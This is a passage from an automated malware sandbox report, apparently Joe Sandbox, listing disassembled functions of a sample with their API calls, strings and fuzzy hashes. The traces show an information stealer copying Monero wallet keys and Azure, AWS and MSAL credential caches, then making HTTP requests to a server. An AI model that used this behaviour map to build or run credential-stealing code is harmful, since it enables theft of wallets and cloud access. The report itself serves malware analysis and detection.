Instruction Fuzzy Hash: CFE10F7191011AABCF04FBA4DD96EEE73B8BF14305F1041A9F106B61A1DE35AE05CBB6

Function 00B84880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B84839
Part of subcall function 00B847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B84849

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B84915
StrCmpCA.SHLWAPI(?,0133E898), ref: 00B8493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B84ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BA0DDB,00000000,?,?,00000000,?,",00000000,?,0133E738), ref: 00B84DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B84E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B84E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B84E49
InternetCloseHandle.WININET(00000000), ref: 00B84EAD
InternetCloseHandle.WININET(00000000), ref: 00B84EC5
HttpOpenRequestA.WININET(00000000,0133E918,?,0133E010,00000000,00000000,00400100,00000000), ref: 00B84B15

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

InternetCloseHandle.WININET(00000000), ref: 00B84ECF

Strings

------, xrefs: 00B849BD
------, xrefs: 00B84B28
", xrefs: 00B84BF2
------, xrefs: 00B84C69
", xrefs: 00B84D33

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: d7a0166167441e01a8c6e9ddda90fd26514f4533795a9e87d717bba8834ea6a1
Instruction ID: b61e172210292b47813a57394a3dd3b8dd90884a85cf6dfecfa6053d3a2e313a
Opcode Fuzzy Hash: d7a0166167441e01a8c6e9ddda90fd26514f4533795a9e87d717bba8834ea6a1
Instruction Fuzzy Hash: CD12AC71920119AADF15EBA4DD92FEEB3B9BF15300F5041E9B10672091EF702F49CBA6

Function 00B98320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

RegOpenKeyExA.KERNEL32(00000000,0133B1A8,00000000,00020019,00000000,00BA05B6), ref: 00B983A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B98426
wsprintfA.USER32 ref: 00B98459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00B9847B
RegCloseKey.ADVAPI32(00000000), ref: 00B9848C
RegCloseKey.ADVAPI32(00000000), ref: 00B98499

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Strings

?, xrefs: 00B9837A
%s\%s, xrefs: 00B9844D
- , xrefs: 00B985A3

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: c37e8bf623f9f9194d4672a275391297f21336b0d6fb1447d9ae11d8a48b1f9a
Instruction ID: 008d1ac6ca36f5a7c3fd0fe4d2a78b59f8270b49484be599328fbeb3b0a42abe
Opcode Fuzzy Hash: c37e8bf623f9f9194d4672a275391297f21336b0d6fb1447d9ae11d8a48b1f9a
Instruction Fuzzy Hash: 8C81087191021DABDB24DB64CC95FEAB7B8FF08704F0082E9E109A6180DF756A85CFE1

Function 00B86280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B84839
Part of subcall function 00B847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B84849

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

InternetOpenA.WININET(00BA0DFE,00000001,00000000,00000000,00000000), ref: 00B862E1
StrCmpCA.SHLWAPI(?,0133E898), ref: 00B86303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B86335
HttpOpenRequestA.WININET(00000000,GET,?,0133E010,00000000,00000000,00400100,00000000), ref: 00B86385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B863BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B863D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B863FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B8646D
InternetCloseHandle.WININET(00000000), ref: 00B864EF
InternetCloseHandle.WININET(00000000), ref: 00B864F9
InternetCloseHandle.WININET(00000000), ref: 00B86503

Strings

ERROR, xrefs: 00B864C9
GET, xrefs: 00B8637C
ERROR, xrefs: 00B86407

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 0c9a27ea182b42d178333890f2f291c7e7555616cc76e4b4f193e2def10ac09a
Instruction ID: 6c6c7741793a91aad8755c879280cd315a9a9bdd042b30dbb642c047d86c4e3a
Opcode Fuzzy Hash: 0c9a27ea182b42d178333890f2f291c7e7555616cc76e4b4f193e2def10ac09a
Instruction Fuzzy Hash: 4B712F71A10219ABDF14EBA4DC89FEE77B4FB44704F1041A8F509AB290DBB46A85CF91

Function 00B95510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A820: lstrlen.KERNEL32(00B84F05,?,?,00B84F05,00BA0DDE), ref: 00B9A82B
Part of subcall function 00B9A820: lstrcpy.KERNEL32(00BA0DDE,00000000), ref: 00B9A885

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B95644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B956A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B95857

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B95228

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B95318
Part of subcall function 00B952C0: lstrlen.KERNEL32(00000000), ref: 00B9532F
Part of subcall function 00B952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00B95364
Part of subcall function 00B952C0: lstrlen.KERNEL32(00000000), ref: 00B95383
Part of subcall function 00B952C0: lstrlen.KERNEL32(00000000), ref: 00B953AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B9578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B95940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B95A0C
Sleep.KERNEL32(0000EA60), ref: 00B95A1B

Strings

ERROR, xrefs: 00B95636
ERROR, xrefs: 00B9577D
ERROR, xrefs: 00B95932
ERROR, xrefs: 00B95693
ERROR, xrefs: 00B95849
ERROR, xrefs: 00B959FE

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 337bafb8fc02583c75e47e3007f61dfcb03f14c64b4e311d8df4cef9b37786bc
Instruction ID: eebc9c298504ece7ef5d15b64618d7f98f1dfe49839edd1605b6e132f94fcbbb
Opcode Fuzzy Hash: 337bafb8fc02583c75e47e3007f61dfcb03f14c64b4e311d8df4cef9b37786bc
Instruction Fuzzy Hash: B5E102719202099ACF15FBA4DC97DED73BCAF54340F5085B8B506A61A1EF346E09CBE2

Function 00B94D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

lstrcat.KERNEL32(?,00000000), ref: 00B94DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00B94DCD

Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B9492C
Part of subcall function 00B94910: FindFirstFileA.KERNEL32(?,?), ref: 00B94943

lstrcat.KERNEL32(?,00000000), ref: 00B94E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00B94E59

Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA0FDC), ref: 00B94971
Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA0FE0), ref: 00B94987
Part of subcall function 00B94910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B94B7D
Part of subcall function 00B94910: FindClose.KERNEL32(000000FF), ref: 00B94B92

lstrcat.KERNEL32(?,00000000), ref: 00B94EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B94EE5

Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B949B0
Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA08D2), ref: 00B949C5
Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B949E2
Part of subcall function 00B94910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B94A1E
Part of subcall function 00B94910: lstrcat.KERNEL32(?,0133E8F8), ref: 00B94A4A
Part of subcall function 00B94910: lstrcat.KERNEL32(?,00BA0FF8), ref: 00B94A5C
Part of subcall function 00B94910: lstrcat.KERNEL32(?,?), ref: 00B94A70
Part of subcall function 00B94910: lstrcat.KERNEL32(?,00BA0FFC), ref: 00B94A82
Part of subcall function 00B94910: lstrcat.KERNEL32(?,?), ref: 00B94A96
Part of subcall function 00B94910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B94AAC
Part of subcall function 00B94910: DeleteFileA.KERNEL32(?), ref: 00B94B31

Strings

*.*, xrefs: 00B94E64
Azure\.azure, xrefs: 00B94DD3
\.IdentityService\, xrefs: 00B94ED9
\.aws\, xrefs: 00B94E4D
Azure\.IdentityService, xrefs: 00B94EEB
msal.cache, xrefs: 00B94EF0
Azure\.aws, xrefs: 00B94E5F
*.*, xrefs: 00B94DD8
\.azure\, xrefs: 00B94DC1

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: a9615f8ff6a7b70e9ca01420eb032aaa362411b18f17ba67cadfac1997a2e2de
Instruction ID: 5c65baf63cec4403cacfab1b9268b3fdbdc89c6aea08e15ec4f24f69ac3e749d
Opcode Fuzzy Hash: a9615f8ff6a7b70e9ca01420eb032aaa362411b18f17ba67cadfac1997a2e2de
Instruction Fuzzy Hash: A441947A95421867DB60F760EC47FED33B8AF25704F0048E4B245A61D1EEB45BC9CBA2

Function 00B81310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B812B4
Part of subcall function 00B812A0: RtlAllocateHeap.NTDLL(00000000), ref: 00B812BB
Part of subcall function 00B812A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00B812D7
Part of subcall function 00B812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B812F5
Part of subcall function 00B812A0: RegCloseKey.ADVAPI32(?), ref: 00B812FF

lstrcat.KERNEL32(?,00000000), ref: 00B8134F
lstrlen.KERNEL32(?), ref: 00B8135C
lstrcat.KERNEL32(?,.keys), ref: 00B81377

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B98B60: GetSystemTime.KERNEL32(00BA0E1A,0133A2B0,00BA05AE,?,?,00B813F9,?,0000001A,00BA0E1A,00000000,?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B98B86

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B81465

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B899EC
Part of subcall function 00B899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B89A11
Part of subcall function 00B899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B89A31
Part of subcall function 00B899C0: ReadFile.KERNEL32(000000FF,?,00000000,00B8148F,00000000), ref: 00B89A5A
Part of subcall function 00B899C0: LocalFree.KERNEL32(00B8148F), ref: 00B89A90
Part of subcall function 00B899C0: CloseHandle.KERNEL32(000000FF), ref: 00B89A9A

DeleteFileA.KERNEL32(00000000), ref: 00B814EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00B81335
\Monero\wallet.keys, xrefs: 00B8138D
.keys, xrefs: 00B8136B
wallet_path, xrefs: 00B81330

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
